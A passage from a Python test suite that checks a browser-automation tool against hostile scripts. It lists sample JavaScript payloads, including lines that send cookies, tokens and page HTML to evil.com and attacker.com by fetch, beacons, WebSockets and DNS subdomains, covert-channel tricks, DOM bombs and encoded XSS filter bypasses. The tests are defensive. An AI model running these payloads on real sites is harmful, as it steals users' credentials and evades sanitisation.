'.repeat(1000000);",
"var iframe = document.createElement('iframe'); iframe.src = 'data:text/html,' + '
'.repeat(1000000); document.body.appendChild(iframe);",
]
for script in dom_bomb_scripts:
with pytest.raises(Exception) as exc_info:
await browser.execute_script("https://example.com", script)
error_msg = str(exc_info.value).lower()
assert "dom" in error_msg or "limit" in error_msg or "exceeded" in error_msg
class TestDataExfiltrationPrevention:
"""Test prevention of data exfiltration attacks."""
@pytest.mark.asyncio
async def test_data_exfiltration_via_network(self):
"""Test prevention of data exfiltration via network requests."""
browser = Browser(BrowserConfig())
mock_page = AsyncMock()
mock_page.goto = AsyncMock()
mock_page.close = AsyncMock()
mock_browser = AsyncMock()
mock_browser.new_page.return_value = mock_page
browser._browser = mock_browser
browser._is_started = True
# Data exfiltration attempts
exfiltration_scripts = [
"fetch('http://evil.com/collect', {method: 'POST', body: document.body.innerHTML});",
"navigator.sendBeacon('http://evil.com/collect', document.cookie);",
"new Image().src = 'http://evil.com/collect?data=' + encodeURIComponent(document.body.innerHTML);",
"fetch('http://evil.com/collect?data=' + btoa(localStorage.getItem('sensitive-data')));",
"websocket = new WebSocket('ws://evil.com/collect'); websocket.send(document.body.innerHTML);",
]
for script in exfiltration_scripts:
# Mock network blocking
mock_page.evaluate.side_effect = Exception("Network request blocked by security policy")
with pytest.raises(Exception) as exc_info:
await browser.execute_script("https://example.com", script)
error_msg = str(exc_info.value).lower()
assert any(keyword in error_msg for keyword in ["network", "blocked", "security", "policy"])
@pytest.mark.asyncio
async def test_covert_channel_prevention(self):
"""Test prevention of covert channel data exfiltration."""
browser = Browser(BrowserConfig())
mock_page = AsyncMock()
mock_page.goto = AsyncMock()
mock_page.close = AsyncMock()
mock_page.evaluate.return_value = "covert_blocked"
mock_browser = AsyncMock()
mock_browser.new_page.return_value = mock_page
browser._browser = mock_browser
browser._is_started = True
# Covert channel attempts
covert_scripts = [
"document.title = btoa(document.cookie); return document.title;", # Title channel
"location.hash = btoa(localStorage.getItem('token')); return location.hash;", # URL fragment channel
"history.pushState({}, '', '/?data=' + btoa(document.body.innerHTML)); return location.href;", # History channel
"var canvas = document.createElement('canvas'); var ctx = canvas.getContext('2d'); ctx.fillText(document.cookie, 0, 0); return canvas.toDataURL();", # Canvas channel
]
for script in covert_scripts:
result = await browser.execute_script("https://example.com", script)
# Should not contain sensitive data or should be blocked
assert result == "covert_blocked" or not any(
sensitive in str(result).lower()
for sensitive in ["cookie", "token", "password", "secret"]
)
@pytest.mark.asyncio
async def test_dns_exfiltration_prevention(self):
"""Test prevention of DNS-based data exfiltration."""
browser = Browser(BrowserConfig())
mock_page = AsyncMock()
mock_page.goto = AsyncMock()
mock_page.close = AsyncMock()
mock_browser = AsyncMock()
mock_browser.new_page.return_value = mock_page
browser._browser = mock_browser
browser._is_started = True
# DNS exfiltration attempts
dns_exfiltration_scripts = [
"fetch('http://' + btoa(document.cookie) + '.evil.com');",
"new Image().src = 'http://' + btoa(localStorage.getItem('token')) + '.attacker.com';",
"document.createElement('script').src = 'http://' + encodeURIComponent(document.body.innerHTML).substring(0,50) + '.evil.com/script.js';",
]
for script in dns_exfiltration_scripts:
# Mock DNS blocking
mock_page.evaluate.side_effect = Exception("DNS request blocked")
with pytest.raises(Exception) as exc_info:
await browser.execute_script("https://example.com", script)
error_msg = str(exc_info.value).lower()
assert any(keyword in error_msg for keyword in ["dns", "blocked", "request"])
class TestInputSanitizationBypass:
"""Test attempts to bypass input sanitization."""
@pytest.mark.asyncio
async def test_encoding_bypass_attempts(self):
"""Test various encoding bypass attempts."""
browser = Browser(BrowserConfig())
mock_page = AsyncMock()
mock_page.goto = AsyncMock()
mock_page.close = AsyncMock()
mock_browser = AsyncMock()
mock_browser.new_page.return_value = mock_page
browser._browser = mock_browser
browser._is_started = True
# Encoding bypass attempts
bypass_scripts = [
# Unicode bypass
"eval('\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0022\\u0078\\u0073\\u0073\\u0022\\u0029')", # alert("xss")
# Base64 bypass
"eval(atob('YWxlcnQoInhzcyIp'))", # alert("xss")
# Hex bypass
"eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x22\\x78\\x73\\x73\\x22\\x29')", # alert("xss")
# Mixed case bypass
"EvAl('AlErT(\"xss\")')",
# String concatenation bypass
"'ev' + 'al'('al' + 'ert(\"xss\")')",
# Character code bypass
"String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41)", # alert("xss")
]
for script in bypass_scripts:
# Mock bypass prevention
mock_page.evaluate.side_effect = Exception("Encoding bypass attempt detected")
with pytest.raises(Exception) as exc_info:
await browser.execute_script("https://example.com", script)
error_msg = str(exc_info.value).lower()
assert any(keyword in error_msg for keyword in ["bypass", "detected", "encoding"])
@pytest.mark.asyncio
async def test_polyglot_payload_prevention(self):
"""Test prevention of polyglot payloads."""
browser = Browser(BrowserConfig())
mock_page = AsyncMock()
mock_page.goto = AsyncMock()
mock_page.close = AsyncMock()
mock_browser = AsyncMock()
mock_browser.new_page.return_value = mock_page
browser._browser = mock_browser
browser._is_started = True
# Polyglot payloads that work in multiple contexts
polyglot_scripts = [
"javascript:/*-->